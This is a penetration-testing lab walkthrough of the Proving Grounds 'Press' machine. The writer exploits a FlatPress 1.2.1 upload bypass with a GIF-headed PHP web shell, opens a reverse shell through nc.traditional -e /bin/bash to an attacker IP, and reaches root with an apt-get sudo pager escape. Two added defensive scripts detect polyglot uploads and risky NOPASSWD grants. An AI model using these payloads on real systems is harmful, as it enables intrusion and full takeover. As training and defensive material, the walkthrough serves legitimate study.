OSCP - Proving Grounds - Press
Key takeaways
- The nc binary may be installed under a different file name than expected
Walkthrough
Run nmap; the scan reveals that FlatPress 1.2.1 is installed:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-22 14:34 UTC
Nmap scan report for 192.168.58.29
Host is up (0.00062s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
| 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_ 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: Lugx Gaming Shop HTML5 Template
|_http-server-header: Apache/2.4.56 (Debian)
8089/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: FlatPress
|_http-generator: FlatPress fp-1.2.1
|_http-server-header: Apache/2.4.56 (Debian)
A quick search for the version turns up "Flatpress 1.2.1 - File upload bypass to RCE Vulnerebility · Issue #152 · flatpressblog/flatpress · GitHub".
Reproduce it step by step following the issue:
C:\home\kali\Documents\OFFSEC\GoToWork\Press> cat rev.php
GIF89a;
<?php
system($_GET['cmd']);
?>
Command execution works, but getting a reverse shell turned out to be tricky: none of the usual approaches worked. Running whereis nc showed that nc is in fact installed, and in two different versions, each under its own file name.
After starting nc -nlvp 8080 locally, requesting the following link gives a working reverse shell:
192.168.247.29:8089/fp-content/attachs/rev.php?cmd=/usr/bin/nc.traditional 192.168.45.243 8080 -e/bin/bash
Running sudo -l then shows that /usr/bin/apt-get can be run through sudo without a password:
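The upload above gets through because the file opens with an image magic header while the rest of it is PHP. As an added defender-side example (not part of the original writeup or of FlatPress), the script below scans an upload directory for exactly that shape: files whose first bytes look like GIF, PNG or JPEG but which also contain a PHP open tag. The directory, file names and contents are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original writeup): flag uploaded files that
# start with an image magic header but also carry a PHP open tag.
# All paths and sample files below are constructed for the demonstration.
set -eu

# Create a throwaway directory standing in for fp-content/attachs and fill
# it with constructed samples: one polyglot, one image-only file, one plain
# PHP file and one text file.
make_sample_dir() {
  dir=$(mktemp -d)
  printf 'GIF89a;\n<?php\nsystem($_GET["cmd"]);\n?>\n' > "$dir/rev.php"
  printf 'GIF89a\001\002\003 image payload, no code here\n' > "$dir/logo.gif"
  printf '<?php echo "hello"; ?>\n' > "$dir/plain.php"
  printf 'just a note\n' > "$dir/readme.txt"
  echo "$dir"
}

# Hex of a file's first four bytes, e.g. 47494638 for "GIF8".
magic4() {
  od -An -tx1 -N4 "$1" | tr -d ' \n'
}

# Print, sorted, every regular file under $1 whose leading bytes look like
# GIF, PNG or JPEG but which also contains "<?php" somewhere in its body.
find_polyglots() {
  find "$1" -type f | sort | while read -r f; do
    case "$(magic4 "$f")" in
      47494638|89504e47|ffd8ff*)
        if grep -q '<?php' "$f"; then
          printf '%s\n' "$f"
        fi
        ;;
    esac
  done
}

# Stand-alone run: build the samples and list the hits (only rev.php).
sample=$(make_sample_dir)
find_polyglots "$sample"
rm -rf "$sample"
```

The content check is the detection half; the mitigation half is to make sure nothing in the attachments directory is ever handed to the PHP engine, for example by disabling script execution for that directory in the web server configuration, so that a file which slips past the type check is served as an opaque download rather than run.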
C:\home\kali\Documents\OFFSEC\GoToWork\Press> nc -nlvp 8080
listening on [any] 8080 ...
connect to [192.168.45.243] from (UNKNOWN) [192.168.247.29] 38304
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
clear
whereis python
python: /usr/bin/python3.9 /usr/lib/python2.7 /usr/lib/python3.9 /etc/python3.9 /usr/local/lib/python3.9
/usr/bin/python3.9 -c 'import pty;pty.spawn("/bin/bash")'
www-data@debian:/var/www/flatpress/fp-content/attachs$
www-data@debian:/var/www/flatpress/fp-content/attachs$ sudo -l
sudo -l
Matching Defaults entries for www-data on debian:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on debian:
(ALL) NOPASSWD: /usr/bin/apt-get
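The sudo listing above is the whole privilege escalation: apt-get hands control to a pager during normal operation, so a passwordless grant on it is a root shell for the service account. As an added example (not part of the original writeup), the script below parses a `sudo -l` listing of the same shape, extracts the NOPASSWD commands and flags any whose basename is on a small watch list of programs that open a pager or editor. The listing, the second rule in it and the watch list are all constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original writeup): parse `sudo -l` output and
# flag NOPASSWD grants that amount to a root shell. The sample listing and
# the watch list are constructed for the demonstration.
set -eu

# Constructed sample, same shape as the writeup's `sudo -l` listing, with an
# extra password-protected rule added for contrast.
SAMPLE_SUDO_L='Matching Defaults entries for www-data on debian:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on debian:
    (ALL) NOPASSWD: /usr/bin/apt-get
    (root) /usr/bin/systemctl restart apache2'

# Print the path of every command granted with NOPASSWD, one per line.
# Comma-separated command lists on one rule are split; arguments dropped.
nopasswd_commands() {
  printf '%s\n' "$1" \
    | sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*NOPASSWD:[[:space:]]*//p' \
    | tr ',' '\n' \
    | awk 'NF { print $1 }'
}

# Constructed watch list: programs whose ordinary operation hands control
# to a pager or an editor, so a NOPASSWD grant on them is root-equivalent.
PAGER_SPAWNERS='apt-get apt man less more vi vim'

# Print each NOPASSWD command whose basename is on the watch list.
flag_shell_escapes() {
  nopasswd_commands "$1" | while read -r cmd; do
    base=${cmd##*/}
    for p in $PAGER_SPAWNERS; do
      if [ "$base" = "$p" ]; then
        printf '%s\n' "$cmd"
      fi
    done
  done
}

# Stand-alone run: prints /usr/bin/apt-get for the sample listing.
flag_shell_escapes "$SAMPLE_SUDO_L"
```

Run it against the real `sudo -l` output of each service account during a host review; any hit is a rule to remove. If a service account genuinely needs to drive package updates, delegate a wrapper script with fixed arguments rather than the package manager itself.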
Following the GTFOBins entry for apt-get, privilege escalation succeeds:
www-data@debian:/var/www/flatpress/fp-content/attachs$ sudo apt-get changelog apt
<ress/fp-content/attachs$ sudo apt-get changelog apt
Get:1 store: apt 2.2.4 Changelog
Fetched 487 kB in 0s (48.5 MB/s)
WARNING: terminal is not fully functional
/tmp/apt-changelog-ckmFFy/apt.changelog (press RETURN)!/bin/bash
!//bbiinn//bbaasshh!/bin/bash
root@debian:/var/www/flatpress/fp-content/attachs# id
id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/var/www/flatpress/fp-content/attachs# cat /root/proof.txt
cat /root/proof.txt
67e4a1ea60acd1c2223841b63eae78c0
root@debian:/var/www/flatpress/fp-content/attachs#